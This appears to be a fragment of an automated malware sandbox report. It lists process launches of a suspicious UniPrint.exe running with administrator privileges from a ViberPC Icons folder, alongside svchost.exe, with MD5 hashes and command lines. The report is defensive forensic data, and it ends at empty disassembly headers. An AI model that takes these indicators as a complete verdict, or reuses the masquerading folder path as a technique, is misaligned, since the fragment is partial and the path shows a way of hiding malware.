Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Imagebase: 0x400000
File size: 4375848 bytes
MD5 hash: EBDBA07BFABCF24F5D79EF27247EA643
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 14:02:26
Start date: 15/09/2021
Path: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Imagebase: 0x400000
File size: 4375848 bytes
MD5 hash: EBDBA07BFABCF24F5D79EF27247EA643
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 14:02:29
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 14:02:32
Start date: 15/09/2021
Path: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Imagebase: 0x400000
File size: 4375848 bytes
MD5 hash: EBDBA07BFABCF24F5D79EF27247EA643
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 14:02:39
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis